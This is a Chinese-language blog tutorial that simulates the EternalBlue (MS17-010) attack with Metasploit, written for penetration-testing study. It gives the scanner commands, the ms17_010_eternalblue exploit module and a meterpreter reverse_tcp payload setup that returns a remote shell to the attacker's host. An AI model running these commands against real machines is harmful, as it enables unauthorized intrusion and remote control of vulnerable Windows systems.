当前位置:网站首页>Metasploit-永恒之蓝攻击
Metasploit-永恒之蓝攻击
2022-07-27 09:56:00 【不会就跑路的小白】
永恒之蓝
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。
恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
攻击模拟
我们现在模拟使用MS17_010(永恒之蓝漏洞)漏洞攻击:
寻找MS17_010模块: search ms17_010

Auxiliary辅助探测模块
该模块不会直接在攻击机和靶机之间建立访问,它们只负责执行扫描,嗅探,指纹识别等相关功能以辅助渗透测试。
输入命令:
use auxiliary/scanner/smb/smb_ms17_010
查看这个模块需要配置的信息:show options

RHOSTS 参数是要探测主机的ip或ip范围,我们探测一个ip范围内的主机是否存在漏洞
输入:
set RHOSTS 192.168.58.1 192.168.58.2
或者
set RHOSTS 192.168.58.1-192.168.58.9
或者
set RHOSTS 192.168.58.1/24 #C段探测
输入:exploit 攻击,这里有+号的就是可能存在漏洞的主机.

Exploit漏洞利用模块
选择漏洞攻击模块:
use exploit/windows/smb/ms17_010_eternalblue
查看这个漏洞的信息:info


查看可攻击的系统平台,这个命令显示该攻击模块针对哪些特定操作系统版本、语言版本的系统:
show targets
这里只有一个,有些其他的漏洞模块对操作系统的语言和版本要求的很严,比如MS08_067,这样就要
我们指定目标系统的版本的。如果不设置的话,MSF会自动帮我们判断目标操作系统的版本和语言(利用
目标系统的指纹特征)

Payload攻击载荷模块
攻击载荷是我们期望在目标系统在被渗透攻击之后完成的实际攻击功能的代码,成功渗透目标后,用于在目标系统上运行任意命令。
查看攻击载荷:show payloads
该命令可以查看当前漏洞利用模块下可用的所有Payload

设置攻击载荷:
set payload windows/x64/meterpreter/reverse_tcp
查看模块需要配置的参数:
show options

设置RHOST,也就是要攻击主机的ip:set RHOST 192.168.0.103
设置LHOST,也就是我们主机的ip,用于接收从目标机弹回来的shell:set LHOST 192.168.0.104
如果我们这里不设置lport的话,默认是4444端口监听
攻击: exploit
出现WIN即攻击成功,返回靶机shell。
边栏推荐
- Switch port mirroring Configuration Guide
- I grabbed a ticket and thought I found the system bug of 12306
- 华为交换机双上行组网Smart-link配置指南
- Shell function, system function, basename [string / pathname] [suffix] can be understood as taking the file name in the path, dirname file absolute path, and user-defined function
- Final examination paper of engineering materials
- 直播倒计时 3 天|SOFAChannel#29 基于 P2P 的文件和镜像加速系统 Dragonfly
- Matlab-绘制叠加阶梯图和线图
- 圆环工件毛刺(凸起)缺口(凹陷)检测案例
- How to restore the original version after installing Hal Library
- TFlite 的简单使用
猜你喜欢

Brush the title "sword finger offer" day04

Pytorch installation (very detailed)
![Shell function, system function, basename [string / pathname] [suffix] can be understood as taking the file name in the path, dirname file absolute path, and user-defined function](/img/3d/d7276d2010f1d77a3bd572cc66eced.png)
Shell function, system function, basename [string / pathname] [suffix] can be understood as taking the file name in the path, dirname file absolute path, and user-defined function

Understand chisel language. 23. Chisel sequential circuit (III) -- detailed explanation of chisel shift register

Food safety | the more you eat junk food, the more you want to eat it? Please keep this common food calorimeter

并发之线程状态转换

It's great to write code for 32 inch curved screen display! Send another one!

安装CUDA失败的情况nsight visual studio edition失败

Anaconda安装(非常详细)

vs2019社区版下载教程(详细)
随机推荐
3D face reconstruction and dense alignment with position map progression network
线代003
Learn typescript (1)
Shell integrated application cases, archiving files, sending messages
File upload of native input tag
Is Damon partgroupdef a custom object?
LeetCode.565. 数组嵌套____暴力dfs->剪枝dfs->原地修改
Understand chisel language. 22. Chisel sequential circuit (II) -- detailed explanation of chisel counter: counter, timer and pulse width modulation
女粉想要找男朋友,竟是为了...
如何创建一个带诊断工具的.NET镜像
Stylegan paper notes + modify code to try 3D point cloud generation
How to restore the original version after installing Hal Library
Matlab-实时编辑器介绍
找工作 4 个月, 面试 15 家,拿到 3 个 offer
Shell process control (emphasis), if judgment, case statement, let usage, for ((initial value; loop control condition; variable change)) and for variable in value 1 value 2 value 3..., while loop
3D人脸重建:Joint 3D Face Reconstruction and Dense Alignment with position Map Regression Network
It's great to write code for 32 inch curved screen display! Send another one!
Pyautogui实现自动化办公-RPA小case
Understand chisel language. 25. Advanced input signal processing of chisel (I) -- asynchronous input and de jitter
Summary of engineering material knowledge points (full)